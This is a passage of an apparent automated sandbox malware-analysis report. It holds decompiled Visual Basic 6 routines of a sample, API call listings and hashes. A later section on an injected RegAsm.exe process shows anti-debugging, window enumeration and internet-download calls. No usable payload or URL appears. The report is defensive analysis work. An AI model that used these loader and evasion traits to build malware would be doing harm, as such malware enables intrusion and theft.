				signed int _t157;
				signed int _t162;
				signed int _t169;
				signed int _t174;
				char* _t179;
				signed int _t183;
				intOrPtr _t222;

				_push(0x401536);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t222;
				L00401530();
				_v12 = _t222;
				_v8 = 0x401438;
				_push(0x4050f8);
				L00401674();
				asm("fcomp qword [0x401430]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					if( *0x425698 != 0) {
						_v152 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v152 = 0x425698;
					}
					_v120 =  *_v152;
					_t157 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v64);
					asm("fclex");
					_v124 = _t157;
					if(_v124 >= 0) {
						_t16 =  &_v156;
						 *_t16 = _v156 & 0x00000000;
						__eflags =  *_t16;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v120);
						_push(_v124);
						L004017B8();
						_v156 = _t157;
					}
					_v128 = _v64;
					_t162 =  *((intOrPtr*)( *_v128 + 0x58))(_v128,  &_v60);
					asm("fclex");
					_v132 = _t162;
					if(_v132 >= 0) {
						_t29 =  &_v160;
						 *_t29 = _v160 & 0x00000000;
						__eflags =  *_t29;
					} else {
						_push(0x58);
						_push(0x4050c0);
						_push(_v128);
						_push(_v132);
						L004017B8();
						_v160 = _t162;
					}
					_v140 = _v60;
					_v60 = _v60 & 0x00000000;
					L00401752();
					L0040178E();
					if( *0x425698 != 0) {
						_v164 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v164 = 0x425698;
					}
					_v120 =  *_v164;
					_t169 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v64);
					asm("fclex");
					_v124 = _t169;
					if(_v124 >= 0) {
						_t51 =  &_v168;
						 *_t51 = _v168 & 0x00000000;
						__eflags =  *_t51;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v120);
						_push(_v124);
						L004017B8();
						_v168 = _t169;
					}
					_v128 = _v64;
					_t174 =  *((intOrPtr*)( *_v128 + 0xe0))(_v128,  &_v60);
					asm("fclex");
					_v132 = _t174;
					if(_v132 >= 0) {
						_t64 =  &_v172;
						 *_t64 = _v172 & 0x00000000;
						__eflags =  *_t64;
					} else {
						_push(0xe0);
						_push(0x4050c0);
						_push(_v128);
						_push(_v132);
						L004017B8();
						_v172 = _t174;
					}
					_v144 = _v60;
					_v60 = _v60 & 0x00000000;
					L00401752();
					L0040178E();
					if( *0x425010 != 0) {
						_v176 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v176 = 0x425010;
					}
					_t179 =  &_v64;
					L004017C4();
					_v120 = _t179;
					_t183 =  *((intOrPtr*)( *_v120 + 0x48))(_v120,  &_v60, _t179,  *((intOrPtr*)( *((intOrPtr*)( *_v176)) + 0x304))( *_v176));
					asm("fclex");
					_v124 = _t183;
					if(_v124 >= 0) {
						_t89 =  &_v180;
						 *_t89 = _v180 & 0x00000000;
						__eflags =  *_t89;
					} else {
						_push(0x48);
						_push(0x4050b0);
						_push(_v120);
						_push(_v124);
						L004017B8();
						_v180 = _t183;
					}
					_v148 = _v60;
					_v60 = _v60 & 0x00000000;
					_v72 = _v148;
					_v80 = 8;
					_push( &_v80);
					_push( &_v96);
					L0040166E();
					L00401764();
					L0040178E();
					L00401794();
				}
				_push( &_v80);
				L00401668();
				_push( &_v80);
				L00401728();
				L00401752();
				L00401794();
				_v72 = 0x17;
				_v80 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v80);
				L00401662();
				L00401752();
				L00401794();
				if( *0x425010 != 0) {
					_v184 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404370);
					L004017BE();
					_v184 = 0x425010;
				}
				_t147 =  &_v64;
				L004017C4();
				_v120 = _t147;
				_t151 =  *((intOrPtr*)( *_v120 + 0x70))(_v120,  &_v116, _t147,  *((intOrPtr*)( *((intOrPtr*)( *_v184)) + 0x308))( *_v184));
				asm("fclex");
				_v124 = _t151;
				if(_v124 >= 0) {
					_t129 =  &_v188;
					 *_t129 = _v188 & 0x00000000;
					__eflags =  *_t129;
				} else {
					_push(0x70);
					_push(0x405050);
					_push(_v120);
					_push(_v124);
					L004017B8();
					_v188 = _t151;
				}
				_v56 = _v116;
				L0040178E();
				asm("wait");
				_push(0x4191f7);
				L00401794();
				L00401740();
				L00401740();
				L00401740();
				L00401740();
				return _t151;
			}

0x00418de4
0x00418def
0x00418df0
0x00418dfc
0x00418e04
0x00418e07
0x00418e0e
0x00418e13
0x00418e18
0x00418e1e
0x00418e20
0x00418e21
0x00418e2e
0x00418e4b
0x00418e30
0x00418e30
0x00418e35
0x00418e3a
0x00418e3f
0x00418e3f
0x00418e5d
0x00418e6c
0x00418e6f
0x00418e71
0x00418e78
0x00418e94
0x00418e94
0x00418e94
0x00418e7a
0x00418e7a
0x00418e7c
0x00418e81
0x00418e84
0x00418e87
0x00418e8c
0x00418e8c
0x00418e9e
0x00418ead
0x00418eb0
0x00418eb2
0x00418eb9
0x00418ed5
0x00418ed5
0x00418ed5
0x00418ebb
0x00418ebb
0x00418ebd
0x00418ec2
0x00418ec5
0x00418ec8
0x00418ecd
0x00418ecd
0x00418edf
0x00418ee5
0x00418ef2
0x00418efa
0x00418f06
0x00418f23
0x00418f08
0x00418f08
0x00418f0d
0x00418f12
0x00418f17
0x00418f17
0x00418f35
0x00418f44
0x00418f47
0x00418f49
0x00418f50
0x00418f6c
0x00418f6c
0x00418f6c
0x00418f52
0x00418f52
0x00418f54
0x00418f59
0x00418f5c
0x00418f5f
0x00418f64
0x00418f64
0x00418f76
0x00418f85
0x00418f8b
0x00418f8d
0x00418f94
0x00418fb3
0x00418fb3
0x00418fb3
0x00418f96
0x00418f96
0x00418f9b
0x00418fa0
0x00418fa3
0x00418fa6
0x00418fab
0x00418fab
0x00418fbd
0x00418fc3
0x00418fd0
0x00418fd8
0x00418fe4
0x00419001
0x00418fe6
0x00418fe6
0x00418feb
0x00418ff0
0x00418ff5
0x00418ff5
0x00419025
0x00419029
0x0041902e
0x0041903d
0x00419040
0x00419042
0x00419049
0x00419065
0x00419065
0x00419065
0x0041904b
0x0041904b
0x0041904d
0x00419052
0x00419055
0x00419058
0x0041905d
0x0041905d
0x0041906f
0x00419075
0x0041907f
0x00419082
0x0041908c
0x00419090
0x00419091
0x0041909c
0x004190a4
0x004190ac
0x004190ac
0x004190b4
0x004190b5
0x004190bd
0x004190be
0x004190c8
0x004190d0
0x004190d5
0x004190dc
0x004190e3
0x004190e5
0x004190e7
0x004190e9
0x004190ee
0x004190ef
0x004190f9
0x00419101
0x0041910d
0x0041912a
0x0041910f
0x0041910f
0x00419114
0x00419119
0x0041911e
0x0041911e
0x0041914e
0x00419152
0x00419157
0x00419166
0x00419169
0x0041916b
0x00419172
0x0041918e
0x0041918e
0x0041918e
0x00419174
0x00419174
0x00419176
0x0041917b
0x0041917e
0x00419181
0x00419186
0x00419186
0x00419198
0x0041919e
0x004191a3
0x004191a4
0x004191d1
0x004191d9
0x004191e1
0x004191e9
0x004191f1
0x004191f6

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 00418DFC
__vbaR8Str.MSVBVM60(004050F8,?,?,?,?,00401536), ref: 00418E13
__vbaNew2.MSVBVM60(00405090,00425698,004050F8,?,?,?,?,00401536), ref: 00418E3A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 00418E87
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000058), ref: 00418EC8
__vbaStrMove.MSVBVM60(00000000,?,004050C0,00000058), ref: 00418EF2
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,00000058), ref: 00418EFA
__vbaNew2.MSVBVM60(00405090,00425698), ref: 00418F12
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 00418F5F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,000000E0), ref: 00418FA6
__vbaStrMove.MSVBVM60(00000000,?,004050C0,000000E0), ref: 00418FD0
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,000000E0), ref: 00418FD8
__vbaNew2.MSVBVM60(00404370,00425010), ref: 00418FF0
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419029
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050B0,00000048), ref: 00419058
#666.MSVBVM60(?,00000008), ref: 00419091
__vbaVarMove.MSVBVM60(?,00000008), ref: 0041909C
__vbaFreeObj.MSVBVM60(?,00000008), ref: 004190A4
__vbaFreeVar.MSVBVM60(?,00000008), ref: 004190AC
#612.MSVBVM60(?,004050F8,?,?,?,?,00401536), ref: 004190B5
__vbaStrVarMove.MSVBVM60(?,?,004050F8,?,?,?,?,00401536), ref: 004190BE
__vbaStrMove.MSVBVM60(?,?,004050F8,?,?,?,?,00401536), ref: 004190C8
__vbaFreeVar.MSVBVM60(?,?,004050F8,?,?,?,?,00401536), ref: 004190D0
#702.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,?,?), ref: 004190EF
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,?,?), ref: 004190F9
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,?,?), ref: 00419101
__vbaNew2.MSVBVM60(00404370,00425010,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00419119
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419152
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000070), ref: 00419181
__vbaFreeObj.MSVBVM60(00000000,?,00405050,00000070), ref: 0041919E
__vbaFreeVar.MSVBVM60(004191F7), ref: 004191D1
__vbaFreeStr.MSVBVM60(004191F7), ref: 004191D9
__vbaFreeStr.MSVBVM60(004191F7), ref: 004191E1
__vbaFreeStr.MSVBVM60(004191F7), ref: 004191E9
__vbaFreeStr.MSVBVM60(004191F7), ref: 004191F1

Memory Dump Source

Source File: 00000000.00000002.476026542.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.476020961.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476059663.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476065318.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476080679.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$New2$#612#666#702Chkstk
String ID:
API String ID: 1476624330-0
Opcode ID: 1db5d863acd36814b9e57baa687840b3faf3a7ca33eac978bf6202d28ccb4b9e
Instruction ID: c62321164223b69fe27d9d1f0ffefe8911e83c18d126604ca5835001fb755088
Opcode Fuzzy Hash: 1db5d863acd36814b9e57baa687840b3faf3a7ca33eac978bf6202d28ccb4b9e
Instruction Fuzzy Hash: 3BC10570E00618EFDB20EFA1C895BDDBBB4BF08304F60416AE015B72A2DB785985CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041FAA7, Relevance: 18.1, APIs: 12, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041FAA7(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v44;
				signed int _v48;
				void* _v52;
				char _v68;
				char _v84;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v124;
				signed int _t60;
				signed int _t65;
				char* _t69;
				void* _t81;
				void* _t83;
				intOrPtr _t84;

				_t84 = _t83 - 0xc;
				 *[fs:0x0] = _t84;
				L00401530();
				_v16 = _t84;
				_v12 = 0x401468;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x401536, _t81);
				if( *0x425698 != 0) {
					_v116 = 0x425698;
				} else {
					_push(0x425698);
					_push(0x405090);
					L004017BE();
					_v116 = 0x425698;
				}
				_v88 =  *_v116;
				_t60 =  *((intOrPtr*)( *_v88 + 0x14))(_v88,  &_v52);
				asm("fclex");
				_v92 = _t60;
				if(_v92 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x405080);
					_push(_v88);
					_push(_v92);
					L004017B8();
					_v120 = _t60;
				}
				_v96 = _v52;
				_t65 =  *((intOrPtr*)( *_v96 + 0xd0))(_v96,  &_v48);
				asm("fclex");
				_v100 = _t65;
				if(_v100 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0xd0);
					_push(0x4050c0);
					_push(_v96);
					_push(_v100);
					L004017B8();
					_v124 = _t65;
				}
				_v112 = _v48;
				_v48 = _v48 & 0x00000000;
				L00401752();
				L0040178E();
				_push( &_v68);
				L00401758();
				_push(1);
				_push( &_v68);
				_t69 =  &_v84;
				_push(_t69);
				L0040175E();
				L00401764();
				L00401794();
				_push(0x41fc10);
				L00401794();
				L00401740();
				return _t69;
			}

0x0041faaa
0x0041fab9
0x0041fac3
0x0041facb
0x0041face
0x0041fad5
0x0041fae4
0x0041faee
0x0041fb08
0x0041faf0
0x0041faf0
0x0041faf5
0x0041fafa
0x0041faff
0x0041faff
0x0041fb14
0x0041fb23
0x0041fb26
0x0041fb28
0x0041fb2f
0x0041fb48
0x0041fb31
0x0041fb31
0x0041fb33
0x0041fb38
0x0041fb3b
0x0041fb3e
0x0041fb43
0x0041fb43
0x0041fb4f
0x0041fb5e
0x0041fb64
0x0041fb66
0x0041fb6d
0x0041fb89
0x0041fb6f
0x0041fb6f
0x0041fb74
0x0041fb79
0x0041fb7c
0x0041fb7f
0x0041fb84
0x0041fb84
0x0041fb90
0x0041fb93
0x0041fb9d
0x0041fba5
0x0041fbad
0x0041fbae
0x0041fbb3
0x0041fbb8
0x0041fbb9
0x0041fbbc
0x0041fbbd
0x0041fbc8
0x0041fbd0
0x0041fbd5
0x0041fc02
0x0041fc0a
0x0041fc0f

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 0041FAC3
__vbaNew2.MSVBVM60(00405090,00425698,?,?,?,?,00401536), ref: 0041FAFA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 0041FB3E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,000000D0), ref: 0041FB7F
__vbaStrMove.MSVBVM60 ref: 0041FB9D
__vbaFreeObj.MSVBVM60 ref: 0041FBA5
#610.MSVBVM60(?), ref: 0041FBAE
#552.MSVBVM60(?,?,00000001,?), ref: 0041FBBD
__vbaVarMove.MSVBVM60(?,?,00000001,?), ref: 0041FBC8
__vbaFreeVar.MSVBVM60(?,?,00000001,?), ref: 0041FBD0
__vbaFreeVar.MSVBVM60(0041FC10,?,?,00000001,?), ref: 0041FC02
__vbaFreeStr.MSVBVM60(0041FC10,?,?,00000001,?), ref: 0041FC0A

Memory Dump Source

Source File: 00000000.00000002.476026542.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.476020961.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476059663.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476065318.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476080679.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#552#610ChkstkNew2
String ID:
API String ID: 407087230-0
Opcode ID: 86c73eba93b18247b97125464b4c71bb3850fcb56bc775e8b1a1207a1d113f53
Instruction ID: 5af6e1594676a24b41b7fd2a1fa6a9da2160caa17f1824f64c44ef68fec1042b
Opcode Fuzzy Hash: 86c73eba93b18247b97125464b4c71bb3850fcb56bc775e8b1a1207a1d113f53
Instruction Fuzzy Hash: 1B41B371940218EFCB10EFE5C995BDDBBB4BF08704F60412AE106BB2A1D778694ACF58

Uniqueness

Uniqueness Score: -1.00%

Function 00420296, Relevance: 13.6, APIs: 9, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00420296(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				char _v28;
				void* _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				signed int _t59;
				signed int _t63;
				char* _t67;
				signed int _t71;
				short _t72;
				intOrPtr _t84;

				_push(0x401536);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t84;
				_push(0x34);
				L00401530();
				_v12 = _t84;
				_v8 = 0x4014a0;
				if( *0x425698 != 0) {
					_v56 = 0x425698;
				} else {
					_push(0x425698);
					_push(0x405090);
					L004017BE();
					_v56 = 0x425698;
				}
				_v36 =  *_v56;
				_t59 =  *((intOrPtr*)( *_v36 + 0x4c))(_v36,  &_v28);
				asm("fclex");
				_v40 = _t59;
				if(_v40 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x405080);
					_push(_v36);
					_push(_v40);
					L004017B8();
					_v60 = _t59;
				}
				_v44 = _v28;
				_t63 =  *((intOrPtr*)( *_v44 + 0x28))(_v44);
				asm("fclex");
				_v48 = _t63;
				if(_v48 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x28);
					_push(0x4050a0);
					_push(_v44);
					_push(_v48);
					L004017B8();
					_v64 = _t63;
				}
				L0040178E();
				if( *0x425010 != 0) {
					_v68 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404370);
					L004017BE();
					_v68 = 0x425010;
				}
				_t67 =  &_v28;
				L004017C4();
				_v36 = _t67;
				_t71 =  *((intOrPtr*)( *_v36 + 0xf8))(_v36,  &_v32, _t67,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x300))( *_v68));
				asm("fclex");
				_v40 = _t71;
				if(_v40 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x405060);
					_push(_v36);
					_push(_v40);
					L004017B8();
					_v72 = _t71;
				}
				_t72 = _v32;
				_v24 = _t72;
				L0040178E();
				_push(0x42040b);
				return _t72;
			}

0x0042029b
0x004202a6
0x004202a7
0x004202ae
0x004202b1
0x004202b9
0x004202bc
0x004202ca
0x004202e4
0x004202cc
0x004202cc
0x004202d1
0x004202d6
0x004202db
0x004202db
0x004202f0
0x004202ff
0x00420302
0x00420304
0x0042030b
0x00420324
0x0042030d
0x0042030d
0x0042030f
0x00420314
0x00420317
0x0042031a
0x0042031f
0x0042031f
0x0042032b
0x00420336
0x00420339
0x0042033b
0x00420342
0x0042035b
0x00420344
0x00420344
0x00420346
0x0042034b
0x0042034e
0x00420351
0x00420356
0x00420356
0x00420362
0x0042036e
0x00420388
0x00420370
0x00420370
0x00420375
0x0042037a
0x0042037f
0x0042037f
0x004203a3
0x004203a7
0x004203ac
0x004203bb
0x004203c1
0x004203c3
0x004203ca
0x004203e6
0x004203cc
0x004203cc
0x004203d1
0x004203d6
0x004203d9
0x004203dc
0x004203e1
0x004203e1
0x004203ea
0x004203ee
0x004203f5
0x004203fa
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 004202B1
__vbaNew2.MSVBVM60(00405090,00425698,?,?,?,?,00401536), ref: 004202D6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,0000004C,?,?,?,?,?,?,?,?,?,?,00401536), ref: 0042031A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A0,00000028,?,?,?,?,?,?,?,?,?,?,00401536), ref: 00420351
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401536), ref: 00420362
__vbaNew2.MSVBVM60(00404370,00425010,?,?,?,?,?,?,?,?,?,?,?,?,00401536), ref: 0042037A
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401536), ref: 004203A7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405060,000000F8), ref: 004203DC
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401536), ref: 004203F5

Memory Dump Source

Source File: 00000000.00000002.476026542.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.476020961.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476059663.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476065318.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476080679.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$Chkstk
String ID:
API String ID: 2989710064-0
Opcode ID: 7cb7c06cab55200d7153afb725d0524ccc072ce7ccb5edb2845d0eee4ada50d8
Instruction ID: 4738e9cd60a2e98b0cdecc0369e1e57583b36ec8a3493f936c0ff9e6fbd929c4
Opcode Fuzzy Hash: 7cb7c06cab55200d7153afb725d0524ccc072ce7ccb5edb2845d0eee4ada50d8
Instruction Fuzzy Hash: 85411474A40628EFCB10DF90D889BEDBBF4FF08314F90406AE101B72A1C7795945DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041F9CF, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041F9CF(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr* _v40;
				signed int _v44;
				char* _t26;
				signed int _t29;
				intOrPtr _t40;

				_push(0x401536);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t40;
				_push(0x18);
				L00401530();
				_v12 = _t40;
				_v8 = 0x401458;
				if( *0x425010 != 0) {
					_v40 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404370);
					L004017BE();
					_v40 = 0x425010;
				}
				_t26 =  &_v24;
				L004017C4();
				_v28 = _t26;
				_t29 =  *((intOrPtr*)( *_v28 + 0x208))(_v28, _t26,  *((intOrPtr*)( *((intOrPtr*)( *_v40)) + 0x304))( *_v40));
				asm("fclex");
				_v32 = _t29;
				if(_v32 >= 0) {
					_v44 = _v44 & 0x00000000;
				} else {
					_push(0x208);
					_push(0x4050b0);
					_push(_v28);
					_push(_v32);
					L004017B8();
					_v44 = _t29;
				}
				L0040178E();
				_push(0x41fa94);
				return _t29;
			}

0x0041f9d4
0x0041f9df
0x0041f9e0
0x0041f9e7
0x0041f9ea
0x0041f9f2
0x0041f9f5
0x0041fa03
0x0041fa1d
0x0041fa05
0x0041fa05
0x0041fa0a
0x0041fa0f
0x0041fa14
0x0041fa14
0x0041fa38
0x0041fa3c
0x0041fa41
0x0041fa4c
0x0041fa52
0x0041fa54
0x0041fa5b
0x0041fa77
0x0041fa5d
0x0041fa5d
0x0041fa62
0x0041fa67
0x0041fa6a
0x0041fa6d
0x0041fa72
0x0041fa72
0x0041fa7e
0x0041fa83
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 0041F9EA
__vbaNew2.MSVBVM60(00404370,00425010,?,?,?,?,00401536), ref: 0041FA0F
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,00401536), ref: 0041FA3C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050B0,00000208,?,?,?,?,?,?,00401536), ref: 0041FA6D
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401536), ref: 0041FA7E

Memory Dump Source

Source File: 00000000.00000002.476026542.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.476020961.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476059663.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476065318.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476080679.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: f958c83c4dadff630629d1883ec1a78ba07ff9b195490c6a0944d50c2ce8d6b5
Instruction ID: 9d45b6e4a5a3fef078a8b23a2140ea62faa800a21d0c5f91b3d4270efcb1ba48
Opcode Fuzzy Hash: f958c83c4dadff630629d1883ec1a78ba07ff9b195490c6a0944d50c2ce8d6b5
Instruction Fuzzy Hash: E2115E70A40609AFCB10DF91D855FEE7BB8EF08704F60407AE101B72A1C77D1945DBA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 6304 Parent PID: 204 RegAsm.exeCOMMON

Executed Functions

Function 00A00AD7, Relevance: 11.2, APIs: 1, Strings: 5, Instructions: 650COMMON

Download Yara Rule

Strings

Jy, xrefs: 00A00EE4
1T-o, xrefs: 00A067DA
down, xrefs: 00A06769
1T-o, xrefs: 00A067DF
1.!T, xrefs: 00A0098F

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Jy$1.!T$1T-o$1T-o$down
API String ID: 1029625771-772149904
Opcode ID: 160be9a5e5a2b56e2208a1d47dbb5eb3a1fa92ac99efa6cf0cc651cf554fc99d
Instruction ID: 8d926c859564b7e0b3aad805bec78f8d987923f91bfd9c42cb2a3b035df1e89a
Opcode Fuzzy Hash: 160be9a5e5a2b56e2208a1d47dbb5eb3a1fa92ac99efa6cf0cc651cf554fc99d
Instruction Fuzzy Hash: 6B02C174B4430FAAEF312E246EA5BEE36669F533D4F748229FC82971C5EB74C8858101

Uniqueness

Uniqueness Score: -1.00%

Function 00A0446B, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 252networklibrarynativeCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6
InternetOpenA.WININET(00A04C5C,00000000,00000000,00000000,00000000,00A0153B,00000000,00000000,?,?,?,?,?,00000000,00000000,00000050), ref: 00A044BF
InternetOpenUrlA.WININET(?,00000004,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00A045A1
LoadLibraryA.KERNEL32(?,0000BF39,?,000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A069C0

Strings

1.!T, xrefs: 00A0098F

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen$InformationLibraryLoadThread
String ID: 1.!T
API String ID: 349944081-3147410236
Opcode ID: 29cfe6a9f06626df0dc1f668b96f08d97411856856dd87610a10645a7e2af049
Instruction ID: a4f0627ae0661bf00f93ad9c663b4731e28539d362375ae4f49d5365bcdccbd9
Opcode Fuzzy Hash: 29cfe6a9f06626df0dc1f668b96f08d97411856856dd87610a10645a7e2af049
Instruction Fuzzy Hash: 9C712AB074034FEEEF315E20AD65BEE36A2AF59750F904125FE469B1C1EB718C44D611

Uniqueness

Uniqueness Score: -1.00%

Function 00A08293, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

1.!T, xrefs: 00A0098F

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 1.!T
API String ID: 0-3147410236
Opcode ID: ae85a8b5dc37d4486b9ddee755049376f7b7fa603c2be84d4458e9f8cf44d13d
Instruction ID: 09933582ba952b918958e66410e30b4e2ca164d200f7c0a0bd36d9c927e48341
Opcode Fuzzy Hash: ae85a8b5dc37d4486b9ddee755049376f7b7fa603c2be84d4458e9f8cf44d13d
Instruction Fuzzy Hash: 4471917074430FDEEF245F24A9657E936A3AF66390FA48239ECC2971C4DB79C884C605

Uniqueness

Uniqueness Score: -1.00%

Function 00A007EC, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(00A00866,?,00000000,?,?,?,?,?,00A00539), ref: 00A00841
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6

Strings

1.!T, xrefs: 00A0098F

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: EnumInformationThreadWindows
String ID: 1.!T
API String ID: 1954852945-3147410236
Opcode ID: 1dc11f9a4a14b2032e800d5befb61aefeb1b1c8d572ebfd299e84957fa92b5c1
Instruction ID: fbe16fd6599fc2d704e53ee43531815956fc9aecf17f54663c7423f186a6bff6
Opcode Fuzzy Hash: 1dc11f9a4a14b2032e800d5befb61aefeb1b1c8d572ebfd299e84957fa92b5c1
Instruction Fuzzy Hash: 01416DB074430FBEEB10AE349E75BEF3692AF55794F618225FD469B1C1DA71C845C201

Uniqueness

Uniqueness Score: -1.00%

Function 00A0087A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00A06869: LoadLibraryA.KERNEL32(?,0000BF39,?,000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A069C0

